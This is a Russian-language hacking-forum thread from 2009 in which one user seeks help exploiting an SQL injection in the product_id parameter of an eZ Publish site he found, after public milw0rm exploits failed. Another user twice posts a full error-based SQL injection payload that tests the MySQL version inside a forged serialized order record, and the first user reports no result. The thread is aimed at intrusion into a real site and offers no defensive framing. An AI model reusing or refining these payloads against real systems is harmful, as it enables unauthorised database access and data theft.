eZ Publish CMS

Discussion in 'Веб-уязвимости' started by YuNi|[c, 14 Nov 2009.

  1. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    привет

    На eZ Publish нету норм эксплойтов, нашел:

    http://milw0rm.com/exploits/7406
    пробовал но можеть спец изменили, не работает.
    пишет HTTP Request not found

    а http://milw0rm.com/exploits/7473
    вообше вместо запуска блабла пишет на комм строке.

    есть ресурс с 4 версии нашел скул в параметре product_id, но ответ вообше удивляет.
    Нестандартный ошибка MySQL. Статьи elekt не помогли(хотя не очень разбирался).

    Может кто проверит код эксплойта но ошибки или составит нормальный запрос на Mysql
     
    #1 YuNi|[c, 14 Nov 2009
    Last edited: 14 Nov 2009
  2. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    Обычная ошибка, ничего нестандартного

    Code:
    product_id=1',(select if(substring(version(),1,1)=4,'2009-11-13',(select 1 union select 2))),'2009-12-13', 'free', '0', 0, '77.146.84.81', 'a:4:{s:15:\"COUPON_DISCOUNT\";d:0;s:10:\"TAX_AMOUNT\";d:0;s:5:\"TAXES\";a:0:{}i:0;a:15:{s:10:\"product_id\";s:2:\"1\'\";s:22:\"paysys_id_not_required\";s:14:\"for javascript\";s:9:\"paysys_id\";s:4:\"free\";s:6:\"name_f\";s:7:\"maxoyyy\";s:6:\"name_l\";s:14:\"dottoyyyyyyyyy\";s:5:\"email\";s:26:\"rhghrefsssss@grhrhmail.com\";s:5:\"login\";s:15:\"fgdgfdfvcccccc7\";s:5:\"pass0\";s:6:\"******\";s:5:\"pass1\";s:6:\"******\";s:10:\"do_payment\";s:1:\"1\";s:11:\"price_group\";s:0:\"\";s:6:\"aff_id\";N;s:14:\"email_verified\";i:-1;s:15:\"BASKET_PRODUCTS\";a:1:{i:0;s:2:\"1\'\";}s:13:\"BASKET_PRICES\";a:1:{i:1;d:0;}}}', NOW(), NOW(), '0')/*
     
    2 people like this.
  3. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    спс но на твой запрос сервер даже не реагировал ((
     
  4. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    а вот так?
    Code:
    product_id=1',(select if(substring(version(),1,1)=5,'2009-11-13',(select 1 union select 2))),'2009-12-13', 'free', '0', 0, '77.146.84.81', 'a:4:{s:15:\"COUPON_DISCOUNT\";d:0;s:10:\"TAX_AMOUNT\";d:0;s:5:\"TAXES\";a:0:{}i:0;a:15:{s:10:\"product_id\";s:2:\"1\'\";s:22:\"paysys_id_not_required\";s:14:\"for javascript\";s:9:\"paysys_id\";s:4:\"free\";s:6:\"name_f\";s:7:\"maxoyyy\";s:6:\"name_l\";s:14:\"dottoyyyyyyyyy\";s:5:\"email\";s:26:\"rhghrefsssss@grhrhmail.com\";s:5:\"login\";s:15:\"fgdgfdfvcccccc7\";s:5:\"pass0\";s:6:\"******\";s:5:\"pass1\";s:6:\"******\";s:10:\"do_payment\";s:1:\"1\";s:11:\"price_group\";s:0:\"\";s:6:\"aff_id\";N;s:14:\"email_verified\";i:-1;s:15:\"BASKET_PRODUCTS\";a:1:{i:0;s:2:\"1\'\";}s:13:\"BASKET_PRICES\";a:1:{i:1;d:0;}}}', NOW(), NOW(), '0')/*
     
  5. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    нет никаких результатов((, можно считать скул просто ошибкой непробиваемым ((